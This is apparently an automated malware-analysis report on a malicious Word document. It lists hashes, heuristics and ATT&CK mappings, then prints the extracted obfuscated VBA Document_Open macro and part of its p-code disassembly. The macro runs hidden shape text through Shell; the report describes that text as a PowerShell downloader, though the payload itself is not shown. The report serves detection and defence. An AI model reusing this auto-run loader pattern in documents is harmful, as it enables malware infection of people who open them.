Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4f55675c3753b64e…

MALICIOUS

Office (OLE)

96.8 KB Created: 2018-11-05 23:18:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: bbe6de1e903c476c83ef63e2a0cf6f16 SHA-1: 952ceec4f69bb752827ab45b6ed0a33c5997784a SHA-256: 4f55675c3753b64e1fd021b884bd3931c120c6febd26e78b6ee458b3ee644d89
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that executes a complex PowerShell command. This command decodes and decompresses a Base64 encoded string, which is then executed. This behavior strongly suggests the macro is designed to download and execute a second-stage payload, likely for further malicious activity. The use of cmd.exe and PowerShell indicates a Command and Scripting Interpreter attack.

Heuristics 8

  • ClamAV: Doc.Downloader.00536d-6923130-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6923130-0
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_open()
   Dim wziYzj(2)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20676 bytes
SHA-256: d0a310a7947d7554fce4c228e22cebf4adda41800aaa2dddd2d394eb45f5f79b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
263 of 359 identifiers look randomly generated (e.g. 'lkbGLPQCojjsLshpFhwTJLoN') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "fdPsSfUdVJf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   Dim wziYzj(2)
wziYzj(0) = InStrRev(CdBDzHi + oqihMBLiimdTDFPpwY + NjjNfj, DvsEulNj + TVBDDifztroQaQAdo + cljhbR) - InStrRev(rjrbED + dAFzjEPCinNGJqus + VHqEjB, RIMMGXci + VhTfwdHzZhlJLzpPuAFtSkV + NpibJ)
wziYzj(1) = InStrRev(hBqLMz + lOjwBNPjTmsPuaCzk + GbHoRoRh, RiHEDXat + uIXKHuvkKzwIErMwdwB + ajfwqDcG) - InStrRev(AzEwjW + wsASASwfNwSbtraODFhiq + oKAvjZ, FYoIfNA + OJWoHFMFIkPOIhdlw + WczoTtb) - InStr(CNKTh + hEdjaRFqOiAzknhntqTmc + HhCEq, DvjVAH + jzEPbzmUWltuSBwPJY + YCjuojX) * InStr(hXHVhNI + uhiEiYPiUBrvzYMuCbDzj + Xhrkn, SidDT + fGUDlmZiJBBOqkwtWB + djLqcTuI)
   Dim viwQz(3)
viwQz(0) = InStr(FKiQqP + UocSomjccYiJKpYBWqPn + ABwGT, MHfDnfja + UnaGNUFwiOhzFIolhWIF + Cfmllb) * InStrRev(puzRD + iAUoaJZBCXsoLiqoLPi + HmaIK, FBiDVo + msFkjimZKiQcrvhHh + BPzkR)
viwQz(1) = InStrRev(iJXRh + KwkzYAwclrqHojjVhqq + wrcvAKzt, jzwKJ + DnNsaWWVriMTNlAhYF + mwfPGK) + InStrRev(ahdnDX + YFZfSRqhNkLJbGVbtvCPM + IiroQp, ISjSwUR + tZjMwSihvMaWqNICzswuji + SnXGcHTV) - InStrRev(JJLNHjuR + cTQBMPpzizijWLtkSCUaEnz + kNAPYjU, VuNScY + adpBOZEhjHsMNMYkdkJz + WouWz) + InStrRev(SHNVAjWn + mwMGLIhPWoiMQdnlKKnJMaE + XUjwiCXD, KfMik + ouwsNiBlXwnAjrQunr + tawjh)
viwQz(2) = InStrRev(bCGElKEw + FuwfYQZEYVRpPPCSQLwwo + hvuwCsGU, ziUKHJdj + MqptZjtOIwcjufIVd + hSsGiH) * InStrRev(TPMlj + BWBMNZwrusdVLwz + WATTY, oivwss + lURzOHTLpjzYOlrhj + hnitl)
   Dim msHlj(4)
msHlj(0) = InStrRev(zOOmmw + aivEMFLiiThofqDiqB + FSszQS, ZMJALBWY + jcDPnjPiwjSAzqlUNo + jtHhjciT) * InStrRev(JUGOpfM + jhPHMJJAkEjsnVjwjzE + kqflw, IdzJR + uXXcTjaRhcuUwNAFLXViYD + vFudLBj)
msHlj(1) = InStrRev(MUltilZ + CjIvdiMHPZYIFitWDQ + MmoZuLh, jPBdVAbq + tTMiMvcnsDurIwvJkAaicMj + jdRfERz) - InStr(DbdRX + smXsjarlOzTpjYwEWaYp + fuFOB, sljZMiw + jTpRjaQzEVTLSUjBfmXKwX + AwRuz) * InStr(uFzJcEi + wwIjTOPuzdzJIFWQkjKYY + PznHzB, OAOul + BzzSllGOWhNnjmFvzibnA + CusjLlf) - InStrRev(KYGqmTq + PnaWcciplpaMzqAOiLwi + bzdPI, CCknKjSQ + vtaEzYpEQcrYCRAcA + FBYJPCp)
msHlj(2) = InStrRev(zjoAozA + NZEPLKiiIORoBnYfoJN + fiKkS, QWAmz + pNfzUhnSfqmAZSAZBjjAt + DzunOz) + InStrRev(iSILsTOM + ujPfvhiabFINmwqYVQrAC + hHIFn, UzTBY + FcZKsaWMqqXOCfNp + adUnizsm)
msHlj(3) = InStrRev(FpKPo + KQzLuRPPLFwnojIwEWJcMj + kiikakoC, ofLFYAmm + LWjwkpNUnlbOcDafLwmK + zmzwIq) + InStrRev(piOChAlX + lJNRjrwLHisZXlCOWs + hYwQi, uoilYDL + ZGLiSwECiKOwIozf + JMblMpO) * InStrRev(PMDzpPhR + ctOwLLffdjFRPuktFZh + SwLjUj, EMPsvQ + BKjLEKOhZVwYocAdNAcLw + BTYZU) - InStrRev(TEPwFJ + wCuNiwTUPvnBwmIrJL + FrbEk, XqUvDaQi + kAEKYqufQMwSGuoWC + pXsESGV)
   Dim DkdYLl(1)
DkdYLl(0) = InStrRev(AHJENla + ozfcMVEKjRTYhiILoa + wIWvjb, RjwRYSF + JTAEfMtkXfcOjbiUpakdi + nbwAO) + InStrRev(wiGuRR + BzDzJCwBwjlBoZJfZBwj + LSEow, YwYkZk + qZYEiqPIPbHmVPuuwk + ZmSMF)
   Dim WVitwc(4)
WVitwc(0) = InStrRev(wijmbqDn + azFzPXZsKFoAootHqzQw + IutjzZj, luhZG + ZkPsJhdACJfCFKNGzdp + ZnzCOtO) + InStrRev(UZfhLZ + PjzQBwzafLzusksiksPHnV + ffUqofz, uUXpz + ODoVbpCsDrHAbmPSvYpXT + dzJvhkQ)
WVitwc(1) = InStrRev(jhtHpsRz + qNikalZhwZjUZwMzVGqGiaN + cDHrm, RzNjJ + kzTDMKdDYAOHvKNs + cphtp) + InStrRev(McInNDG + WAYwwArXzFJDCrwHHmK + fQaQM, tzjnMTS + GpVrNVJmWWEzBcYShZ + WTMLWOK)
WVitwc(2) = InStrRev(riBwoj + HBdpitwEbjvCoKzYB + KbZzNUA, wlJaYo + tSPSnaBYcMmpIkqBQjMZ + DmJqwi) * InStrRev(HijuUX + YusnsiAJGhmZKjtknsiU + ShdBF, AsISjI + wIjswNwzpbamNfuaaBKz + OlhCO)
WVitwc(3) = InStrRev(NQpjC + zXljLZjnNStmToJbm + NtjdQMW, nwsbDPin + hwUkVZdzBabqKrziON + RfwuFC) + InStrRev(WAGAd + NEmDZVLGXEsEMSXjCF + XGtrEak, RijibJkr + qXBJicondtqEOwfjRl + Kbqza)
Const qWIaJVPvKw = 960174517 - 960174517
Shell@ Shapes(1).TextFrame.TextRange.Text + hZhjbY + LwKzZWC, qWIaJVPvKw
   Dim NwclUL(3)
NwclUL(0) = InStrRev(LRXPo + lkbGLPQCojjsLshpFhwTJLoN + XrIsaKz, Aaztjw + vwTkhJvQoRSuXBYzanSB + XFSIo) - InStrRev(YjsRwC + MPJViIXZwcIzKrbiKDcVcZ + OikzOjOO, fJzAb + LGWOpWXYifkwnOIzow + lwSUPR) - InStr(bjMRS + YPOcqEjfciWjrcwhkRW + FrTDA, iOhkja + UCSnshwTwiAVkoWIWwl + zOEHBGt) + InStrRev(XNiziBYK + FWjstThNSzappicnu + AMwXG, UjMDka + VLiiZjpzdKKvWznAW + VTEOsinW)
NwclUL(1) = InStrRev(iYIRFLnY + AtvEbwpDzakzapKodBafO + OiQnzc, tbXAmvvw + WzbichckKVaOhhJYPz + AjNqi) / InStrRev(iCGdrisj + GXrXbSqXjOmZYubBO + EscSU, zNBHzIaG + NAAGrddCaTjRfnSzuIw + aSMia)
NwclUL(2) = InStrRev(SOCnOzw + jpRKVNWTZFIGlQwjZRRC + BUPrYZHF, SjRfMV + AqVLdYrBPmwPNUsji + zCUXz) * InStrRev(TTEaG + cprdShrSowfWToLPA + rFoqlh, WJltliB + ObFkfRLBHzPBYJwlobw + jSpucTjS) / InStrRev(BZniLhWi + wTISkVjPPkRkKjWihbj + obkbmE, LRwPKWKH + DVOjohwzAwCwtdIkztLw + TLkDM) / InStrRev(padJAFn + nGRAISiasCWsHrdUSzvkn + YmjtYU, FEhnz + KmUJEzTmZbTpwsjvuwuXT + lBnpnfSp)
   Dim QdQQE(3)
QdQQE(0) = InStrRev(TwBnKNiD + HjQOAKLRwwmvJjFzQfpw + XjFbn, fdLJWuQ + EmBzhBoAidWRjPKdvF + tKGSoqm) * InStrRev(zKaCuCXW + aJbioGZGjnGzUIaiMzOon + wPpMnGP, USbSL + fFCrLFmQwnTTMUHKiktvj + LopLH)
QdQQE(1) = InStr(jiilOV + CwqSwTziwKAQhlAztFzE + BnilCO, IhwENt + pLMzWBwYPOWzQFCvjSN + XiIzoFI) * InStr(iPlsr + nhNnAVrcECKwbjbZ + zHSHHPSB, KJvskAok + QXkDzIioCQSEHnfsACqJFr + TLbvr) + InStrRev(ccXPJwU + RisEnKFIrGOiLwFcW + ZAdiL, WtjRdsW + POAWmzKQOsDMtAKIsaI + Zlzat) - InStr(HMApNV + apNcwKKAoDdiOGUswAB + FskrMD, KpiCNjzz + zmqTntEjsctTYFDZkwwJ + sfFIZX)
QdQQE(2) = InStrRev(ZEzjmFqm + lPQWJwJuXMdAzvOzWJV + uUHKjwiz, XwCWWIl + XmwDUBncnLKPbppMav + MYFiwZ) / InStrRev(ltsKIzQn + oGKFRHOhjSYqhiWkSqkkwa + XNiYBD, iFGGz + fLYMDLlNlXqGEfAkqUQ + UMZzRd)
   Dim DTViq(4)
DTViq(0) = InStrRev(wMwRMd + RwtiFmQfQiCatnCJBvSmrn + OaORhmR, dUZRnol + jnFZvZUIwwMBBBFVwAQ + MZPNs) * InStrRev(hXkDj + ihrNiViPZnQmiPQitNVRM + oRoRrFVM, Gnlnczwq + bZRGijBbIPflkhKhiuaIb + hrRQXb)
DTViq(1) = InStrRev(SPzhm + jkRYbBFLWohBRpwMCJ + lorkR, sXZdLp + iQjlFjSwTQwJkuOZjk + jotiQj) * InStrRev(ManNvV + RBWvRBIHzTiwRzwwz + TijzEX, ikXzIi + AiUkWSQiwQVOwZBinMT + mkTjLzHf)
DTViq(2) = InStr(wNdct + EZHGAIKzzGwbcYwmzjTb + SCwLwZI, Hupplb + NABicjcFdHBlTViGjwAX + GUmwjN) + InStrRev(HFanDq + jrvAfjXVUCVCaMcVPijWQ + diXjRsmC, bzjWw + OKpLhswjUEBCVfFsYpCKiz + BEjzS) * InStr(HGHdw + viXiBMwttQDSlMLVpzj + lNwOYw, GwuUm + wPELqiOVvHBRbwiDwnPZ + fIzTqrMF) * InStrRev(ZsUJmX + TRvvhKWmjEKjpjaRBiD + EEWjuYQZ, GGBkamzM + BCnkLGwFrzPWcnmkNSfQ + ZNZziER)
DTViq(3) = InStr(uBRmYo + TDrrkuwzKcVmsBm + MbnfSE, LBOvnNLM + pLfAfupFYPYlmssQMY + EnwvjEvJ) + InStrRev(JwhsLwsp + jamQcAmVwrTJOawJAMOpi + NIjwXWMi, AhSjSaq + qmTSwPujkRkDodoXZUHb + MzjchlYM) * InStr(Cuqijdq + zuztfuplDijLUWNDizsY + krnFq, HcwBPGA + zFIGBrZUQPnUzGVdCBjbHAci + WJMVmz) - InStr(NBsRTJ + qmdrjlQfqTiAIDAaGC + zUEQnCl, CbJpFi + tGpwfIQckOTiYEdXcVc + HwcYvkDY)
End Sub


' Processing file: /tmp/qstore_avkw9_l4
' ===============================================================================
' Module streams:
' Macros/VBA/fdPsSfUdVJf - 10808 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_open())
' Line #1:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0002 
' 	VarDefn wziYzj
' Line #2:
' 	Ld CdBDzHi 
' 	Ld oqihMBLiimdTDFPpwY 
' 	Add 
' 	Ld NjjNfj 
' 	Add 
' 	Ld DvsEulNj 
' 	Ld TVBDDifztroQaQAdo 
' 	Add 
' 	Ld cljhbR 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld rjrbED 
' 	Ld dAFzjEPCinNGJqus 
' 	Add 
' 	Ld VHqEjB 
' 	Add 
' 	Ld RIMMGXci 
' 	Ld VhTfwdHzZhlJLzpPuAFtSkV 
' 	Add 
' 	Ld NpibJ 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	LitDI2 0x0000 
' 	ArgsSt wziYzj 0x0001 
' Line #3:
' 	Ld hBqLMz 
' 	Ld lOjwBNPjTmsPuaCzk 
' 	Add 
' 	Ld GbHoRoRh 
' 	Add 
' 	Ld RiHEDXat 
' 	Ld uIXKHuvkKzwIErMwdwB 
' 	Add 
' 	Ld ajfwqDcG 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld AzEwjW 
' 	Ld wsASASwfNwSbtraODFhiq 
' 	Add 
' 	Ld oKAvjZ 
' 	Add 
' 	Ld FYoIfNA 
' 	Ld OJWoHFMFIkPOIhdlw 
' 	Add 
' 	Ld WczoTtb 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	Ld CNKTh 
' 	Ld hEdjaRFqOiAzknhntqTmc 
' 	Add 
' 	Ld HhCEq 
' 	Add 
' 	Ld DvjVAH 
' 	Ld jzEPbzmUWltuSBwPJY 
' 	Add 
' 	Ld YCjuojX 
' 	Add 
' 	FnInStr 
' 	Ld hXHVhNI 
' 	Ld uhiEiYPiUBrvzYMuCbDzj 
' 	Add 
' 	Ld Xhrkn 
' 	Add 
' 	Ld SidDT 
' 	Ld fGUDlmZiJBBOqkwtWB 
' 	Add 
' 	Ld djLqcTuI 
' 	Add 
' 	FnInStr 
' 	Mul 
' 	Sub 
' 	LitDI2 0x0001 
' 	ArgsSt wziYzj 0x0001 
' Line #4:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0003 
' 	VarDefn viwQz
' Line #5:
' 	Ld FKiQqP 
' 	Ld UocSomjccYiJKpYBWqPn 
' 	Add 
' 	Ld ABwGT 
' 	Add 
' 	Ld MHfDnfja 
' 	Ld UnaGNUFwiOhzFIolhWIF 
' 	Add 
' 	Ld Cfmllb 
' 	Add 
' 	FnInStr 
' 	Ld puzRD 
' 	Ld iAUoaJZBCXsoLiqoLPi 
' 	Add 
' 	Ld HmaIK 
' 	Add 
' 	Ld FBiDVo 
' 	Ld msFkjimZKiQcrvhHh 
' 	Add 
' 	Ld BPzkR 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0000 
' 	ArgsSt viwQz 0x0001 
' Line #6:
' 	Ld iJXRh 
' 	Ld KwkzYAwclrqHojjVhqq 
' 	Add 
' 	Ld wrcvAKzt 
' 	Add 
' 	Ld jzwKJ 
' 	Ld DnNsaWWVriMTNlAhYF 
' 	Add 
' 	Ld mwfPGK 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld ahdnDX 
' 	Ld YFZfSRqhNkLJbGVbtvCPM 
' 	Add 
' 	Ld IiroQp 
' 	Add 
' 	Ld ISjSwUR 
' 	Ld tZjMwSihvMaWqNICzswuji 
' 	Add 
' 	Ld SnXGcHTV 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	Ld JJLNHjuR 
' 	Ld cTQBMPpzizijWLtkSCUaEnz 
' 	Add 
' 	Ld kNAPYjU 
' 	Add 
' 	Ld VuNScY 
' 	Ld adpBOZEhjHsMNMYkdkJz 
' 	Add 
' 	Ld WouWz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	Ld SHNVAjWn 
' 	Ld mwMGLIhPWoiMQdnlKKnJMaE 
' 	Add 
' 	Ld XUjwiCXD 
' 	Add 
' 	Ld KfMik 
' 	Ld ouwsNiBlXwnAjrQunr 
' 	Add 
' 	Ld tawjh 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0001 
' 	ArgsSt viwQz 0x0001 
' Line #7:
' 	Ld bCGElKEw 
' 	Ld FuwfYQZEYVRpPPCSQLwwo 
' 	Add 
' 	Ld hvuwCsGU 
' 	Add 
' 	Ld ziUKHJdj 
' 	Ld MqptZjtOIwcjufIVd 
' 	Add 
' 	Ld hSsGiH 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld TPMlj 
' 	Ld BWBMNZwrusdVLwz 
' 	Add 
' 	Ld WATTY 
' 	Add 
' 	Ld oivwss 
' 	Ld lURzOHTLpjzYOlrhj 
' 	Add 
' 	Ld hnitl 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0002 
' 	ArgsSt viwQz 0x0001 
' Line #8:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0004 
' 	VarDefn msHlj
' Line #9:
' 	Ld zOOmmw 
' 	Ld aivEMFLiiThofqDiqB 
' 	Add 
' 	Ld FSszQS 
' 	Add 
' 	Ld ZMJALBWY 
' 	Ld jcDPnjPiwjSAzqlUNo 
' 	Add 
' 	Ld jtHhjciT 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld JUGOpfM 
' 	Ld jhPHMJJAkEjsnVjwjzE 
' 	Add 
' 	Ld kqflw 
' 	Add 
' 	Ld IdzJR 
' 	Ld uXXcTjaRhcuUwNAFLXViYD 
' 	Add 
' 	Ld vFudLBj 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0000 
' 	ArgsSt msHlj 0x0001 
' Line #10:
' 	Ld MUltilZ 
' 	Ld CjIvdiMHPZYIFitWDQ 
' 	Add 
' 	Ld MmoZuLh 
' 	Add 
' 	Ld jPBdVAbq 
' 	Ld tTMiMvcnsDurIwvJkAaicMj 
' 	Add 
' 	Ld jdRfERz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld DbdRX 
' 	Ld smXsjarlOzTpjYwEWaYp 
' 	Add 
' 	Ld fuFOB 
' 	Add 
' 	Ld sljZMiw 
' 	Ld jTpRjaQzEVTLSUjBfmXKwX 
' 	Add 
' 	Ld AwRuz 
' 	Add 
' 	FnInStr 
' 	Ld uFzJcEi 
' 	Ld wwIjTOPuzdzJIFWQkjKYY 
' 	Add 
' 	Ld PznHzB 
' 	Add 
' 	Ld OAOul 
' 	Ld BzzSllGOWhNnjmFvzibnA 
' 	Add 
' 	Ld CusjLlf 
' 	Add 
' 	FnInStr 
' 	Mul 
' 	Sub 
' 	Ld KYGqmTq 
' 	Ld PnaWcciplpaMzqAOiLwi 
' 	Add 
' 	Ld bzdPI 
' 	Add 
' 	Ld CCknKjSQ 
' 	Ld vtaEzYpEQcrYCRAcA 
' 	Add 
' 	Ld FBYJPCp 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	LitDI2 0x0001 
' 	ArgsSt msHlj 0x0001 
' Line #11:
' 	Ld zjoAozA 
' 	Ld NZEPLKiiIORoBnYfoJN 
' 	Add 
' 	Ld fiKkS 
' 	Add 
' 	Ld QWAmz 
' 	Ld pNfzUhnSfqmAZSAZBjjAt 
' 	Add 
' 	Ld DzunOz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld iSILsTOM 
' 	Ld ujPfvhiabFINmwqYVQrAC 
' 	Add 
' 	Ld hHIFn 
' 	Add 
' 	Ld UzTBY 
' 	Ld FcZKsaWMqqXOCfNp 
' 	Add 
' 	Ld adUnizsm 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0002 
' 	ArgsSt msHlj 0x0001 
' Line #12:
' 	Ld FpKPo 
' 	Ld KQzLuRPPLFwnojIwEWJcMj 
' 	Add 
' 	Ld kiikakoC 
' 	Add 
' 	Ld ofLFYAmm 
' 	Ld LWjwkpNUnlbOcDafLwmK 
' 	Add 
' 	Ld zmzwIq 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld piOChAlX 
' 	Ld lJNRjrwLHisZXlCOWs 
' 	Add 
' 	Ld hYwQi 
' 	Add 
' 	Ld uoilYDL 
' 	Ld ZGLiSwECiKOwIozf 
' 	Add 
' 	Ld JMblMpO 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld PMDzpPhR 
' 	Ld ctOwLLffdjFRPuktFZh 
' 	Add 
' 	Ld SwLjUj 
' 	Add 
' 	Ld EMPsvQ 
' 	Ld BKjLEKOhZVwYocAdNAcLw 
' 	Add 
' 	Ld BTYZU 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	Add 
' 	Ld TEPwFJ 
' 	Ld wCuNiwTUPvnBwmIrJL 
' 	Add 
' 	Ld FrbEk 
' 	Add 
' 	Ld XqUvDaQi 
' 	Ld kAEKYqufQMwSGuoWC 
' 	Add 
' 	Ld pXsESGV 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	LitDI2 0x0003 
' 	ArgsSt msHlj 0x0001 
' Line #13:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0001 
' 	VarDefn DkdYLl
' Line #14:
' 	Ld AHJENla 
' 	Ld ozfcMVEKjRTYhiILoa 
' 	Add 
' 	Ld wIWvjb 
' 	Add 
' 	Ld RjwRYSF 
' 	Ld JTAEfMtkXfcOjbiUpakdi 
' 	Add 
' 	Ld nbwAO 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld wiGuRR 
' 	Ld BzDzJCwBwjlBoZJfZBwj 
' 	Add 
' 	Ld LSEow 
' 	Add 
' 	Ld YwYkZk 
' 	Ld qZYEiqPIPbHmVPuuwk 
' 	Add 
' 	Ld ZmSMF 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0000 
' 	ArgsSt DkdYLl 0x0001 
' Line #15:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0004 
' 	VarDefn ZmSMF
' Line #16:
' 	Ld WVitwc 
' 	Ld wijmbqDn 
' 	Add 
' 	Ld azFzPXZsKFoAootHqzQw 
' 	Add 
' 	Ld IutjzZj 
' 	Ld luhZG 
' 	Add 
' 	Ld ZkPsJhdACJfCFKNGzdp 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld ZnzCOtO 
' 	Ld UZfhLZ 
' 	Add 
' 	Ld PjzQBwzafLzusksiksPHnV 
' 	Add 
' 	Ld ffUqofz 
' 	Ld uUXpz 
' 	Add 
' 	Ld ODoVbpCsDrHAbmPSvYpXT 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0000 
' 	ArgsSt ZmSMF 0x0001 
' Line #17:
' 	Ld dzJvhkQ 
' 	Ld jhtHpsRz 
' 	Add 
' 	Ld qNikalZhwZjUZwMzVGqGiaN 
' 	Add 
' 	Ld cDHrm 
' 	Ld RzNjJ 
' 	Add 
' 	Ld kzTDMKdDYAOHvKNs 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld cphtp 
' 	Ld McInNDG 
' 	Add 
' 	Ld WAYwwArXzFJDCrwHHmK 
' 	Add 
' 	Ld fQaQM 
' 	Ld tzjnMTS 
' 	Add 
' 	Ld GpVrNVJmWWEzBcYShZ 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0001 
' 	ArgsSt ZmSMF 0x0001 
' Line #18:
' 	Ld WTMLWOK 
' 	Ld riBwoj 
' 	Add 
' 	Ld HBdpitwEbjvCoKzYB 
' 	Add 
' 	Ld KbZzNUA 
' 	Ld wlJaYo 
' 	Add 
' 	Ld tSPSnaBYcMmpIkqBQjMZ 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld DmJqwi 
' 	Ld HijuUX 
' 	Add 
' 	Ld YusnsiAJGhmZKjtknsiU 
' 	Add 
' 	Ld ShdBF 
' 	Ld AsISjI 
' 	Add 
' 	Ld wIjswNwzpbamNfuaaBKz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0002 
' 	ArgsSt ZmSMF 0x0001 
' Line #19:
' 	Ld OlhCO 
' 	Ld NQpjC 
' 	Add 
' 	Ld zXljLZjnNStmToJbm 
' 	Add 
' 	Ld NtjdQMW 
' 	Ld nwsbDPin 
' 	Add 
' 	Ld hwUkVZdzBabqKrziON 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld RfwuFC 
' 	Ld WAGAd 
' 	Add 
' 	Ld NEmDZVLGXEsEMSXjCF 
' 	Add 
' 	Ld XGtrEak 
' 	Ld RijibJkr 
' 	Add 
' 	Ld qXBJicondtqEOwfjRl 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0003 
' 	ArgsSt ZmSMF 0x0001 
' Line #20:
' 	Dim (Const) 
' 	LitDI4 0x19B5 0x393B 
' 	LitDI4 0x19B5 0x393B 
' 	Sub 
' 	VarDefn Kbqza
' Line #21:
' 	LitDI2 0x0001 
' 	ArgsLd Shell 0x0001 
' 	MemLd Shapes 
' 	MemLd TextFrame 
' 	MemLd Text 
' 	Ld TextRange 
' 	Add 
' 	Ld hZhjbY 
' 	Add 
' 	Ld Kbqza 
' 	ArgsCall qWIaJVPvKw@ 0x0002 
' Line #22:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0003 
' 	VarDefn LwKzZWC
' Line #23:
' 	Ld NwclUL 
' 	Ld LRXPo 
' 	Add 
' 	Ld lkbGLPQCojjsLshpFhwTJLoN 
' 	Add 
' 	Ld XrIsaKz 
' 	Ld Aaztjw 
' 	Add 
' 	Ld vwTkhJvQoRSuXBYzanSB 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld XFSIo 
' 	Ld YjsRwC 
' 	Add 
' 	Ld MPJViIXZwcIzKrbiKDcVcZ 
' 	Add 
' 	Ld OikzOjOO 
' 	Ld fJzAb 
' 	Add 
' 	Ld LGWOpWXYifkwnOIzow 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	Ld lwSUPR 
' 	Ld bjMRS 
' 	Add 
' 	Ld YPOcqEjfciWjrcwhkRW 
' 	Add 
' 	Ld FrTDA 
' 	Ld iOhkja 
' 	Add 
' 	Ld UCSnshwTwiAVkoWIWwl 
' 	Add 
' 	FnInStr 
' 	Sub 
' 	Ld zOEHBGt 
' 	Ld XNiziBYK 
' 	Add 
' 	Ld FWjstThNSzappicnu 
' 	Add 
' 	Ld AMwXG 
' 	Ld UjMDka 
' 	Add 
' 	Ld VLiiZjpzdKKvWznAW 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0000 
' 	ArgsSt LwKzZWC 0x0001 
' Line #24:
' 	Ld VTEOsinW 
' 	Ld iYIRFLnY 
' 	Add 
' 	Ld AtvEbwpDzakzapKodBafO 
' 	Add 
' 	Ld OiQnzc 
' 	Ld tbXAmvvw 
' 	Add 
' 	Ld WzbichckKVaOhhJYPz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld AjNqi 
' 	Ld iCGdrisj 
' 	Add 
' 	Ld GXrXbSqXjOmZYubBO 
' 	Add 
' 	Ld EscSU 
' 	Ld zNBHzIaG 
' 	Add 
' 	Ld NAAGrddCaTjRfnSzuIw 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	LitDI2 0x0001 
' 	ArgsSt LwKzZWC 0x0001 
' Line #25:
' 	Ld aSMia 
' 	Ld SOCnOzw 
' 	Add 
' 	Ld jpRKVNWTZFIGlQwjZRRC 
' 	Add 
' 	Ld BUPrYZHF 
' 	Ld SjRfMV 
' 	Add 
' 	Ld AqVLdYrBPmwPNUsji 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld zCUXz 
' 	Ld TTEaG 
' 	Add 
